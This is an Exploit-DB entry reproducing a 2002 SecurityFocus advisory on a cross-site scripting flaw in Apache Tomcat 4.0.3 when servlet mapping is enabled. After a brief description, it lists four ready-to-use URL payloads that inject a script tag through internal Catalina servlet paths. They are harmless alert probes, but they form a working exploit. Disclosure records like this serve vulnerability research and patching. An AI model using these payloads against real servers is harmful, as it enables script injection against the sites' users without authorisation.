Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting

EDB-ID:

21604




Platform:

Linux

Date:

2002-07-10


source: https://www.securityfocus.com/bid/5193/info

A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack.

When servlet mapping is enabled, it is possible to invoke various servlets and classes and cause Apache Tomcat to throw an exception. This will make cross site scripting attacks possible. 

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>